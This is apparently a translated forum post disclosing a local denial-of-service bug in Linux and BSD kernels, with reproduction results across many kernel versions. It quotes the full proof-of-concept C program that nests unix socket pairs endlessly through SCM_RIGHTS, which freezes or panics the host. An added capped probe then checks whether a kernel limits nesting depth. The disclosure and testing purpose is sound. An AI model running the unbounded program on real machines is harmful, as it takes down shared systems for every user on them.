Local vulnerability in the Linux kernel (and not only), DoS

    Published code that causes the machine to freeze (100% load on all cores, exhaustion of file descriptors).

    Link to code: lkml.org/lkml/2010/11/25/8

    Checked on kernels 27 and 32: the hang reproduces, on both 32- and 64-bit.

    To clarify: after 1-2 seconds a crash dump flies by (no time to read it) and the host reboots. In another test the system crashed after the program ended (after about 5-7 seconds).

    PS People on LOR (linux.org.ru) say that FreeBSD 8.1 also crashes.

    PPS Surprisingly, on CentOS 5.5 with 2.6.18 it does not crash. Run as root it brings the system down; run as an unprivileged user it just quietly runs. In that case root working in the neighbouring console is not disturbed and the system does not crash.

    Trying to clarify the situation:

    1) CentOS 2.6.18 / 64 with an unprivileged user is not affected.
    2) Debian Squeeze 2.6.34 / 64 with an unprivileged user is affected (kernel panic).
    3) According to rumours it could be reproduced on some FreeBSD (from the comments: FreeBSD 8.2-PRERELEASE cannot be reproduced).
    4) From the comments: could not be reproduced on Ubuntu 2.6.32 / 64, reproduces on 2.6.36.
    5) Ubuntu 2.6.34 / 64 reproduces.
    6) From the comments: RHEL 5.5 does not freeze, but it slows down and the process cannot be killed.
    7) From the comments: FreeBSD 4.11, 8.1, OpenBSD 4.6, 4.8, DragonFly BSD 2.8.0 are affected.
    8) OpenVZ + 2.6.18 Debian / CentOS does not reproduce.

    PPPS For those testing: it must be run as an unprivileged user.

    Test code:

    #include <string.h>
    #include <sys/socket.h>
    #include <unistd.h>

    /* Pass descriptor fd over the unix socket unix_fd using SCM_RIGHTS. */
    static int send_fd(int unix_fd, int fd)
    {
      struct msghdr msgh;
      struct cmsghdr *cmsg;
      char buf[CMSG_SPACE(sizeof(fd))];
      memset(&msgh, 0, sizeof(msgh));
      memset(buf, 0, sizeof(buf));
      msgh.msg_control = buf;
      msgh.msg_controllen = sizeof(buf);
      cmsg = CMSG_FIRSTHDR(&msgh);
      cmsg->cmsg_len = CMSG_LEN(sizeof(fd));
      cmsg->cmsg_level = SOL_SOCKET;
      cmsg->cmsg_type = SCM_RIGHTS;
      msgh.msg_controllen = cmsg->cmsg_len;
      memcpy(CMSG_DATA(cmsg), &fd, sizeof(fd));
      return sendmsg(unix_fd, &msgh, 0);
    }

    int main(void)
    {
      int fd[2], ff[2];
      if (socketpair(PF_UNIX, SOCK_SEQPACKET, 0, fd) == -1)
        return 1;
      /* Endlessly nest the current pair inside a fresh one and drop the local
         references: the nested pairs stay in flight inside the new queue. */
      for (;;)
      {
        if (socketpair(PF_UNIX, SOCK_SEQPACKET, 0, ff) == -1)
          return 2;
        send_fd(ff[0], fd[0]);
        send_fd(ff[0], fd[1]);
        close(fd[1]);
        close(fd[0]);
        fd[0] = ff[0];
        fd[1] = ff[1];
      }
    }
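An added probe for checking a kernel, not the LKML code above: it builds the same nesting chain but stops after a fixed number of levels and reports where the kernel refuses. The assumption, taken from the af_unix fix that followed this thread, is that a patched kernel rejects over-deep nesting from sendmsg with ETOOMANYREFS; a kernel that accepts all PROBE_MAX_DEPTH levels enforces no such depth limit and this behaviour may differ on kernels with a reworked unix garbage collector.

```c
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

#define PROBE_MAX_DEPTH 16   /* hard cap: the probe never runs away */
/* Pass one descriptor over a unix socket with SCM_RIGHTS; -1 and errno on failure. */
static int pass_fd(int unix_fd, int fd)
{
    struct msghdr msgh;
    struct cmsghdr *cmsg;
    char buf[CMSG_SPACE(sizeof(fd))] = {0};
    memset(&msgh, 0, sizeof(msgh));
    msgh.msg_control = buf;
    msgh.msg_controllen = sizeof(buf);
    cmsg = CMSG_FIRSTHDR(&msgh);
    cmsg->cmsg_len = CMSG_LEN(sizeof(fd));
    cmsg->cmsg_level = SOL_SOCKET;
    cmsg->cmsg_type = SCM_RIGHTS;
    memcpy(CMSG_DATA(cmsg), &fd, sizeof(fd));
    return (int)sendmsg(unix_fd, &msgh, 0);
}
/* Build the post's chain one level at a time, capped.  Returns the levels the
 * kernel accepted (PROBE_MAX_DEPTH if never refused), -1 if the first socketpair
 * fails; *err receives the errno of the refusal, or 0 (assumed: ETOOMANYREFS). */
int probe_nesting_depth(int *err)
{
    int cur[2], nxt[2], depth = 0, rc;
    *err = 0;
    if (socketpair(PF_UNIX, SOCK_SEQPACKET, 0, cur) == -1) { *err = errno; return -1; }
    while (depth < PROBE_MAX_DEPTH) {
        if (socketpair(PF_UNIX, SOCK_SEQPACKET, 0, nxt) == -1) { *err = errno; break; }
        rc = pass_fd(nxt[0], cur[1]);   /* cur[1] carries everything queued so far */
        if (rc == -1) *err = errno;
        close(cur[0]);                  /* drop our refs; the queued copy keeps cur[1] alive */
        close(cur[1]);
        cur[0] = nxt[0]; cur[1] = nxt[1];
        if (rc == -1) break;
        depth++;
    }
    close(cur[0]);                      /* purging this queue releases the whole chain */
    close(cur[1]);
    return depth;
}
int main(void)
{
    int e, d = probe_nesting_depth(&e);
    printf("%d levels accepted, stop reason: %s\n", d, e ? strerror(e) : "cap reached");
}
```

Run it as an unprivileged user, like the original test; a small accepted depth followed by ETOOMANYREFS is the patched behaviour.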